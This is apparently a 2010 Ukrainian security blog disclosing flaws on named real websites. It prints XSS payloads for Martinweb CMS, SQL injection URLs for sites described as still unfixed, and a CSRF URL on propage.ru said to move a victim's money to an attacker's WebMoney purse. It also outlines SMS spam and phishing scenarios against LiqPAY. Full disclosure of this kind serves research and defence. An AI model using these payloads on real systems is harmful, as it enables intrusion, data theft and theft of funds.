Websecurity - Веб безпека

11.10.2010

У червні, 22.06.2010, я знайшов Cross-Site Scripting та SQL DB Structure Extraction уразливості в Martinweb CMS (це українська комерційна CMS). Які я виявив на сайті www.kontrakt.ua, а також деякі з даних уразливостей є на сайті www.bakotech.com.ua. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

22.12.2010

XSS:

http://site/sitesearch/page--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.html
http://site/index.php?pages='&language=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (з MouseOverJacking):

http://site/index.php?op=search&search='style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'
http://site/index.php?op=search&pages=1'style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'

SQL DB Structure Extraction:

http://site/index.php?pages=’

Уразливі потенційно всі версії Martinweb CMS.

Продовжу свою серсію записів про Business Logic уразливості на різних e-commerce сайтах. В статті Business Logic уразливості через CSRF я писав про Business Logic уразливості, що дозволяють маніпулювати фінансовими даними користувачів. Які можна ініціювати через CSRF атаки.

Після www.prospero.ru та procontext.ru в якості приклада таких уразливостей наведу Cross-Site Request Forgery уразливість на http://www.propage.ru - сайті рекламного брокера (біржи лінок), що мені відома ще з 2007 року. Це ще один проект Prospero. І так само, як і у випадку інших проектів даної компанії, адміни брокера не слідкують за безпекою свого сайта.

Business Logic Flaw (через CSRF):

Можна викрасти гроші користувача через CSRF-атаку. Це можна зробити через POST запит на сторінці http://www.propage.ru/balance.php, або через GET:

http://www.propage.ru/balance.php?money_out=1&pay_type=webmoney_rus&webmoney_rus_summa=1000&money_out_type=express&r_purse=R

Цим запитом ви переведете з рахунку жертви суму 1000 р. на свій R-гаманець в системі WebMoney. В параметрі money_out_type задається тип виведення - зараз в системі наявний лише тип виведення експрес (express).

В даній добірці уразливості в веб додатках:

• CompleteFTP v3.3.0 - Remote Memory Consumption DoS (деталі)
• XSS vulnerability in Rumba CMS (деталі)
• XSS vulnerability in ArtGK CMS forum (деталі)
• HP Insight Control for Linux (IC-Linux) Remote Execution of Arbitrary Code, Local Unauthorized Elevation of Privilege (деталі)
• XSS vulnerability in Rumba CMS tags (деталі)
• New xulrunner packages fix several vulnerabilities (деталі)
• XSS vulnerability in ArtGK CMS (деталі)
• TCPDF Library Remote Code Execution Vulnerability (деталі)
• cPanel Customer Portal (index.cgi) Xss Vulnerability (деталі)
• JAVA web start arbitrary command-line injection - “-XXaltjvm” arbitrary dll loading (0day) (деталі)

Виявлена уразливість в Apple Safari та Google Chrome.

Уразливі продукти: Apple Safari та Google Chrome.

Можливо підмінити адресу в браузерах.

• minor browser UI nitpicking (деталі)

15.10.2009

У лютому, 14.02.2009, я знайшов SQL Injection уразливість на сайті http://www.ukrswift.org. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

21.12.2010

SQL Injection:

http://www.ukrswift.org/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.

В даній добірці експлоіти в веб додатках:

• Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit (деталі)
• GNOME Nautilus code execution PoC (деталі)
• Exploits Easy FTP Server 1.7.0.2 Remote BoF (деталі)
• Easy FTP Server v1.7.0.11 Multiple Command Buffer Overflow exploit (деталі)
• CompleteFTP v3.3.0 - Remote Memory Consumption DoS (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://nachalo.ucoz.ua - інфекція була виявлена 19.12.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 28 разів протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://kiho.in.ua - інфекція була виявлена 18.10.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://valtar.com.ua - інфекція була виявлена 19.12.2010. Зараз сайт входить до переліку підозрілих.
• http://esco.co.ua - інфекція була виявлена 09.12.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://torrents.net.ua - інфекція була виявлена 18.10.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 1 раз протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.

13.10.2009

У лютому, 14.02.2009, я знайшов SQL Injection уразливість на сайті http://www.hetman-cup.org. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

20.12.2010

SQL Injection:

http://www.hetman-cup.org/index.php?content_id=-1%20or%20version()%3E5

Дана уразливість досі не виправлена.

Стосовно ПриватБанка раніше я вже неоднаразово писав про уразливості на www.privatbank.ua та інших сайтах даного банка. Враховуючи, що на протязі 2008-2010 років, як я повідомляв ПБ про дірки на його сайтах, даний банк вів себе несерйозно, ігноруючи мої листи, невиправляючи дірки, а іноді втихаря виправляючи деякі дірки, при цьому жодного разу мені не подякувавши, і з року в рік продовжуючи не слідкувати за безпекою своїх сайтів, тому дані дірки в LiqPAY я оприлюднюю одразу (full disclosure). Від того, чи змінить свою несерйозну поведінку ПБ залежить те, як я оприлюдню наступні дірки в LiqPAY (зокрема дірки, які дозволяють викрадати кошти з рахунків користувачів системи).

У листопаді, 14.11.2009, я знайшов Insufficient Anti-automation уразливість, а 10.09.2010 ще Insufficient Session Expiration уразливість на сайті https://www.liqpay.com. Про що найближчим часом сповіщу адміністрацію сайта.

Insufficient Anti-automation:

На сторінці https://www.liqpay.com/?do=myliqpay немає захисту від автоматизованих запитів (капчі). Що може призвести до наступних сценаріїв атак:

• Спам користувачам мобільних телефонів смс-ками від LiqPAY.
• Перенавантаження смс-шлюзу, що може на деякий час заблокувати доступ до системи її користувачам.
• Проведення фішинг атак, про які я розповідав раніше. Приклад фішинг атаки, що розробив Андрій для демонстрації, коли нападники ініціюють висилання смс-повідомлення жертві, можливий саме через дану уразливість. Тобто можливі автоматизовані фішінг-атаки.

Insufficient Session Expiration:

В системі використовується коротка сесія - на сесію діє обмеження в 10 хвилин, після чого знову потрібно авторизуватися. Що може бути незручним в користуванні, зате добре в плані безпеки. Але починаючи з вересня в системі використовуєть ще одна сесія.

Як я виявив 10.09.2010 в LiqPAY почали використовувати довгу сесію. Перевірка показала, що сесія працює більше двох діб (але менше трьох діб). При цьому нова сесія працює лише для перегляду акаунта, але не для транзакцій.

Це може бути використано для доступу до акаунту користувача для читання інформації про рахунки - через XSS чи при доступі до комп’ютера жертви (тобто це призведе до витоку інформації).

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням hackzona.com.ua, Facebook запрошує хакерів взяти участь у конкурсі.

Facebook оголосила про намір провести конкурс хакерів Hacker Cup. Як повідомляється, в ході змагань учасники будуть займатися зовсім не взломом програм або сервісів, а рішенням непростих алгоритмічних задач. Брати участь у конкурсі може будь-хто, а переможці, окрім всесвітнього визнання, одержать грошові призи.

Це вони конкурси влаштовують замість того щоб безпекою власного сайта займатися . Причому конкурс по взлому свого сайта вони проводити не стали, розуміючи, що це буде проста задача, тому й влаштували конкурс по програмуванню.

За повідомленням news.techlabs.by, хакери знайшли нову уразливість в Internet Explorer.

У листопаді Microsoft випустила новий бюлетень безпеки, що стосується нової незакритої уразливості у веб-оглядачі Internet Explorer. Дана дірка є у всіх версіях браузера, за винятком IE 9 Beta. Вона була виправлена лише в патчі, що вийшов у грудні.

За повідомленням itua.info, за рік зросла кількість атак хакерів на великий і середній бізнес.

За даними Annual Enterprise IT Security Survey, шостого щорічного опитування, що організувала компанія VanDyke Software, помітно участилися хакерські атаки на середній і великий бізнес, особливо збільшилася кількість незаконних проникнень у мережі корпорацій і викрадення інформації в співробітників.